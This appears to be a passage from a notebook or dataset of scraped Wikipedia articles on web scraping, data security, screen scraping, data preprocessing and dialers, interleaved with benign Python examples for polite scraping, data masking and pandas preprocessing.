response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
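Row 412 above walks through the mechanics this notebook relies on: fetch a page, parse it, extract the fields of interest, and load them into a table, and it closes by noting that site administrators deploy counter-measures against bots. The cell below is a minimal, hedged sketch of that workflow using only the libraries already imported here (requests, BeautifulSoup, pandas) plus the standard library: it consults robots.txt, rate-limits its requests, and collects link titles into a DataFrame. The base URL, paths, and CSS selector are hypothetical placeholders, not a reference to any real site.

import time
from urllib import robotparser
from urllib.parse import urljoin
import pandas as pd
import requests
from bs4 import BeautifulSoup

BASE_URL = "https://example.com"                          # hypothetical site
LISTING_PATHS = ["/articles?page=1", "/articles?page=2"]  # hypothetical paths
USER_AGENT = "polite-notebook-scraper/0.1"

def allowed_by_robots(base_url, path, user_agent):
    # Consult robots.txt before fetching; fall back to "allowed" only if robots.txt is unreachable.
    rp = robotparser.RobotFileParser()
    rp.set_url(urljoin(base_url, "/robots.txt"))
    try:
        rp.read()
    except OSError:
        return True
    return rp.can_fetch(user_agent, urljoin(base_url, path))

def scrape_listing(path):
    # Fetch one listing page and extract title/link pairs; the selector is an assumption.
    response = requests.get(urljoin(BASE_URL, path),
                            headers={"User-Agent": USER_AGENT}, timeout=10)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")       # html5lib is installed at the top of this notebook
    rows = []
    for anchor in soup.select("h2 a"):                    # hypothetical selector
        rows.append({"title": anchor.get_text(strip=True),
                     "url": urljoin(BASE_URL, anchor.get("href", ""))})
    return rows

records = []
for path in LISTING_PATHS:
    if not allowed_by_robots(BASE_URL, path, USER_AGENT):
        continue                                          # skip paths the site's crawl policy disallows
    records.extend(scrape_listing(path))
    time.sleep(2)                                         # rate-limit so the crawl stays polite
scraped_df = pd.DataFrame(records)
print(scraped_df.head())

From here the rows can be cleaned and stored like any other DataFrame in this notebook.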
413 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data-centric_security | Data-centric security is an approach to security that emphasizes the dependability of the data itself rather than the security of networks, servers, or applications. Data-centric security is evolving rapidly as enterprises increasingly rely on digital information to run their business and big data projects become mainstream. 1 2 3 It involves the separation of data and digital rights management that assign encrypted files to pre-defined access control lists, ensuring access rights to critical and confidential data are aligned with documented business needs and job requirements that are attached to user identities. 4 Data-centric security also allows organizations to overcome the disconnect between IT security technology and the objectives of business strategy by relating security services directly to the data they implicitly protect; a relationship that is often obscured by the presentation of security as an end in itself. 5 Common processes in a data-centric security model include: 6 From a technical point of view, information (data) centric security relies on the implementation of the following: 7 Data access control is the selective restriction of access to data. Accessing may mean viewing, editing, or using. Defining proper access controls requires to map out the information, where it resides, how important it is, who it is important to, how sensitive the data is and then designing appropriate controls. 8 Encryption is a proven data-centric technique to address the risk of data theft in smartphones, laptops, desktops and even servers, including the cloud. One limitation is that encryption is not always effective once a network intrusion has occurred and cybercriminals operate with stolen valid user credentials. 9 Data Masking is the process of hiding specific data within a database table or cell to ensure that data security is maintained and that sensitive information is not exposed to unauthorized personnel. This may include masking the data from users, developers, third-party and outsourcing vendors, etc. Data masking can be achieved multiple ways: by duplicating data to eliminate the subset of the data that needs to be hidden, or by obscuring the data dynamically as users perform requests. 10 Monitoring all activity at the data layer is a key component of a data-centric security strategy. It provides visibility into the types of actions that users and tools have requested and been authorized to on specific data elements. Continuous monitoring at the data layer combined with precise access control can contribute significantly to the real-time detection of data breaches, limits the damages inflicted by a breach and can even stop the intrusion if proper controls are in place. A 2016 survey 11 shows that most organizations still do not assess database activity continuously and lack the capability to identify database breaches in a timely fashion. A privacy-enhancing technology (PET) is a method of protecting data. PETs allow online users to protect the privacy of their personally identifiable information (PII) provided to and handled by services or applications. PETs use techniques to minimize possession of personal data without losing the functionality of an information system. Cloud computing is an evolving paradigm with tremendous momentum, but its unique aspects exacerbate security and privacy challenges. 
Heterogeneity and diversity of cloud services and environments demand fine-grained access control policies and services that are flexible enough to capture dynamic, context-, or attribute-based access requirements and data protection. 12 Data-centric security measures can also help protect against data leakage and support the life-cycle management of information. 13 |
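Row 413 above describes data masking as hiding specific values so that sensitive records can be handled without exposing them to unauthorized readers. Purely as an illustration of that idea with the pandas library this notebook already uses, the sketch below statically masks two invented personal columns; the field names, the sample values, and the choice of a truncated SHA-256 digest are all assumptions for the example, not a recommended security control.

import hashlib
import pandas as pd

# Hypothetical collected records containing personal fields.
people = pd.DataFrame({
    "name": ["Alice Smith", "Bob Jones"],
    "email": ["alice@example.com", "bob@example.com"],
    "city": ["Austin", "Boston"],
})

def pseudonymize(value):
    # Replace a value with a short, stable digest so rows stay joinable without revealing the original.
    return hashlib.sha256(value.encode("utf-8")).hexdigest()[:12]

masked = people.copy()
masked["name"] = masked["name"].map(pseudonymize)                              # mask identities
masked["email"] = masked["email"].str.replace(r"^[^@]+", "***", regex=True)    # keep only the domain
print(masked)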
414 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File:Screen-Scraping-OCRget.jpg | Screen-Scraping-OCRget.jpg (570 × 195 pixels, file size: 53 KB, MIME type: image/jpeg); the rest of the page is standard file-description boilerplate with no article text. |
415 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-2 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
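Row 415 above distinguishes report mining, extracting data from human-readable report files such as text, HTML, or PDF, from scraping a live interface. As a small, hedged sketch of the idea, the cell below parses an invented fixed-width text report with pandas' read_fwf, reusing the StringIO import from the top of this notebook; the report layout, column names, and values are made up for the example.

from io import StringIO
import pandas as pd

# A tiny, invented fixed-width "spool file" of the kind a legacy system might print.
report = StringIO(
    "ITEM      QTY   PRICE\n"
    "Widget     12   19.99\n"
    "Gadget      3   42.50\n"
    "Sprocket  120    0.75\n"
)

report_df = pd.read_fwf(report)                  # infer the fixed-width columns
report_df["QTY"] = report_df["QTY"].astype(int)
report_df["PRICE"] = report_df["PRICE"].astype(float)
print(report_df)
print("Total value:", (report_df["QTY"] * report_df["PRICE"]).sum())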
416 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_format_management | Data format management (DFM) is the application of a systematic approach to the selection and use of the data formats used to encode information for storage on a computer. In practical terms, data format management is the analysis of data formats and their associated technical, legal or economic attributes which can either enhance or detract from the ability of a digital asset or a given information system to meet specified objectives. Data format management is necessary as the amount of information and the number of people creating it grow. This is especially the case when the information users are working with is difficult to generate or store, costly to acquire, or hard to share. Data format management as an analytic tool or approach is data format neutral. Historically, individuals, organizations and businesses have been categorized by their type of computer or their operating system. Today, however, an entity is defined primarily by its productivity software, such as spreadsheet or word processor programs, and by the way these programs store information. For instance, when browsing the web it is not important which kind of computer is responsible for hosting a site, only that the information it publishes is in a format that is readable by the viewing browser. In this instance, the data format of the published information has more to do with defining compatibilities than the underlying hardware or operating system. Several initiatives have been established to record those data formats commonly used and the software available to read them, for example the PRONOM project at the UK National Archives. |
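Row 416 above is about choosing among data formats and the compatibility trade-offs that follow. As a loose, hedged illustration in this notebook's own terms, the cell below writes the same small table to CSV (spreadsheet-friendly, schema-less) and to JSON records (self-describing, easy for web services to consume) and reads both back; the filenames and column names are placeholders.

import pandas as pd

pages = pd.DataFrame({
    "title": ["Example A", "Example B"],
    "url": ["https://example.com/a", "https://example.com/b"],
})

pages.to_csv("scraped_pages.csv", index=False)                    # plain, untyped interchange format
pages.to_json("scraped_pages.json", orient="records", indent=2)   # self-describing field names

# Round-trip check: both encodings should reproduce the same table.
print(pd.read_csv("scraped_pages.csv").equals(pd.read_json("scraped_pages.json")))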
417 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_pre-processing | Data preprocessing can refer to manipulation, filtration or augmentation of data before it is analyzed, 1 and is often an important step in the data mining process. Data collection methods are often loosely controlled, resulting in out-of-range values, impossible data combinations, and missing values, amongst other issues. The preprocessing pipeline used can often have large effects on the conclusions drawn from the downstream analysis. Thus, representation and quality of data is necessary before running any analysis. 2 Often, data preprocessing is the most important phase of a machine learning project, especially in computational biology. 3 If there is a high proportion of irrelevant and redundant information present or noisy and unreliable data, then knowledge discovery during the training phase may be more difficult. Data preparation and filtering steps can take a considerable amount of processing time. Examples of methods used in data preprocessing include cleaning, instance selection, normalization, one-hot encoding, data transformation, feature extraction and feature selection. Data preprocessing allows for the removal of unwanted data with the use of data cleaning, this allows the user to have a dataset to contain more valuable information after the preprocessing stage for data manipulation later in the data mining process. Editing such dataset to either correct data corruption or human error is a crucial step to get accurate quantifiers like true positives, true negatives, false positives and false negatives found in a confusion matrix that are commonly used for a medical diagnosis. Users are able to join data files together and use preprocessing to filter any unnecessary noise from the data which can allow for higher accuracy. Users use Python programming scripts accompanied by the pandas library which gives them the ability to import data from a comma-separated values as a data-frame. The data-frame is then used to manipulate data that can be challenging otherwise to do in Excel. Pandas (software) which is a powerful tool that allows for data analysis and manipulation; which makes data visualizations, statistical operations and much more, a lot easier. Many also use the R programming language to do such tasks as well. The reason why a user transforms existing files into a new one is because of many reasons. Aspects of data preprocessing may include imputing missing values, aggregating numerical quantities and transforming continuous data into categories (data binning). 4 More advanced techniques like principal component analysis and feature selection are working with statistical formulas and are applied to complex datasets which are recorded by GPS trackers and motion capture devices. Semantic data mining is a subset of data mining that specifically seeks to incorporate domain knowledge, such as formal semantics, into the data mining process. Domain knowledge is the knowledge of the environment the data was processed in. Domain knowledge can have a positive influence on many aspects of data mining, such as filtering out redundant or inconsistent data during the preprocessing phase. 5 Domain knowledge also works as constraint. It does this by using working as set of prior knowledge to reduce the space required for searching and acting as a guide to the data. 
Simply put, semantic preprocessing seeks to filter data using the original environment of said data more correctly and efficiently. There are increasingly complex problems which are asking to be solved by more elaborate techniques to better analyze existing information. fact or opinion? Instead of creating a simple script for aggregating different numerical values into a single value, it make sense to focus on semantic based data preprocessing. 6 The idea is to build a dedicated ontology, which explains on a higher level what the problem is about. 7 In regards to semantic data mining and semantic pre-processing, ontologies are a way to conceptualize and formally define semantic knowledge and data. The Prot g (software) is the standard tool for constructing an ontology. citation needed In general, the use of ontologies bridges the gaps between data, applications, algorithms, and results that occur from semantic mismatches. As a result, semantic data mining combined with ontology has many applications where semantic ambiguity can impact the usefulness and efficiency of data systems. citation needed Applications include the medical field, language processing, banking, 8 and even tutoring, 9 among many more. There are various strengths to using a semantic data mining and ontological based approach. As previously mentioned, these tools can help during the per-processing phase by filtering out non-desirable data from the data set. Additionally, well-structured formal semantics integrated into well designed ontologies can return powerful data that can be easily read and processed by machines. 10 A specifically useful example of this exists in the medical use of semantic data processing. As an example, a patient is having a medical emergency and is being rushed to hospital. The emergency responders are trying to figure out the best medicine to administer to help the patient. Under normal data processing, scouring all the patient’s medical data to ensure they are getting the best treatment could take too long and risk the patients’ health or even life. However, using semantically processed ontologies, the first responders could save the patient’s life. Tools like a semantic reasoner can use ontology to infer the what best medicine to administer to the patient is based on their medical history, such as if they have a certain cancer or other conditions, simply by examining the natural language used in the patient's medical records. 11 This would allow the first responders to quickly and efficiently search for medicine without having worry about the patient’s medical history themselves, as the semantic reasoner would already have analyzed this data and found solutions. In general, this illustrates the incredible strength of using semantic data mining and ontologies. They allow for quicker and more efficient data extraction on the user side, as the user has fewer variables to account for, since the semantically pre-processed data and ontology built for the data have already accounted for many of these variables. However, there are some drawbacks to this approach. Namely, it requires a high amount of computational power and complexity, even with relatively small data sets. 12 This could result in higher costs and increased difficulties in building and maintaining semantic data processing systems. This can be mitigated somewhat if the data set is already well organized and formatted, but even then, the complexity is still higher when compared to standard data processing. 
Below is a simple diagram combining some of the processes, in particular semantic data mining and its use of ontology. The diagram depicts a data set being broken up into two parts: the characteristics of its domain, or domain knowledge, and then the actual acquired data. The domain characteristics are then processed to become user-understood domain knowledge that can be applied to the data. Meanwhile, the data set is processed and stored so that the domain knowledge can be applied to it, so that the process may continue. This application forms the ontology. From there, the ontology can be used to analyze data and process results. Fuzzy preprocessing is another, more advanced technique for solving complex problems. Fuzzy preprocessing and fuzzy data mining make use of fuzzy sets. These data sets are composed of two elements: a set and a membership function for the set, which maps elements to values between 0 and 1. Fuzzy preprocessing uses this fuzzy data set to ground numerical values with linguistic information. Raw data is then transformed into natural language. Ultimately, fuzzy data mining's goal is to help deal with inexact information, such as an incomplete database. Currently, fuzzy preprocessing, as well as other fuzzy-based data mining techniques, sees frequent use with neural networks and artificial intelligence. 13 |
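Row 417 above lists the preprocessing steps this notebook's pandas stack is typically used for: cleaning, imputing missing values, binning continuous values, and one-hot encoding. The cell below is a compact, hedged sketch of those steps on an invented table; the column names, bin edges, and category labels are assumptions made purely for illustration.

from io import StringIO
import pandas as pd

raw = StringIO(
    "age,income,segment\n"
    "34,52000,retail\n"
    ",61000,retail\n"
    "58,,wholesale\n"
    "23,31000,retail\n"
)
sample = pd.read_csv(raw)

# 1. Impute missing numeric values with the column median.
sample["age"] = sample["age"].fillna(sample["age"].median())
sample["income"] = sample["income"].fillna(sample["income"].median())

# 2. Bin the continuous age column into categories (edges are arbitrary here).
sample["age_band"] = pd.cut(sample["age"], bins=[0, 30, 50, 120],
                            labels=["young", "mid", "senior"])

# 3. One-hot encode the categorical segment column.
sample = pd.get_dummies(sample, columns=["segment"], prefix="segment")
print(sample)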
418 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dialer#Fraudulent_dialer | A dialer (American English) or dialler (British English) is an electronic device that is connected to a telephone line to monitor the dialed numbers and alter them to seamlessly provide services that otherwise require lengthy National or International access codes to be dialed. A dialer automatically inserts and modifies the numbers depending on the time of day, country or area code dialed, allowing the user to subscribe to the service providers who offer the best rates. For example, a dialer could be programmed to use one service provider for international calls and another for cellular calls. This process is known as prefix insertion or least cost routing. A line powered dialer does not need any external power but instead takes the power it needs from the telephone line. Another type of dialer is a computer program which creates a connection to the Internet or another computer network over the analog telephone or Integrated Services Digital Network (ISDN). Many operating systems already contain such a program for connections through the Point-to-Point Protocol (PPP), such as WvDial. Many internet service providers offer installation CDs to simplify the process of setting up a proper Internet connection. They either create an entry in the OS's dialer or install a separate dialer (as the AOL software does). In recent years, the term "dialer" often refers specifically to dialers that connect without the user's full knowledge as to cost, with the creator of the dialer intending to commit fraud. call centres use various forms of automatic dialler to place outbound calls to people on contact lists. Dialers are necessary to connect to the internet (at least for non-broadband connections), but some dialers are designed to connect to premium-rate numbers. The providers of such dialers often search for security holes in the operating system installed on the user's computer and use them to set the computer up to dial up through their number, so as to make money from the calls. Alternatively, some dialers inform the user what it is that they are doing, with the promise of special content, accessible only via the special number. Examples of this content include software for download, (usually illegal) trojans posing as MP3s, trojans posing as pornography, or 'underground' programs such as cracks and keygens. The cost of setting up such a service is relatively low, amounting to a few thousand dollars for telecommunications equipment, whereupon the unscrupulous operator will typically take 90% of the cost of a premium rate call, with very few overheads of their own. Users with DSLs (or similar broadband connections) are usually not affected. A dialer can be downloaded and installed, but dialing in is not possible as there are no regular phone numbers in the DSL network and users will not typically have their dial-up modem, if any, connected to a phone line. However, if an ISDN adapter or additional analog modem is installed, the dialer might still be able to get a connection. Malicious dialers can be identified by the following characteristics: citation needed Computers running Microsoft Windows without anti-virus software or proper updates could be vulnerable to Visual Basic-scripts which install a trojan horse which changes values in the Windows Registry and sets Internet Explorer security settings in a way that ActiveX controls can be downloaded from the Internet without warning. 
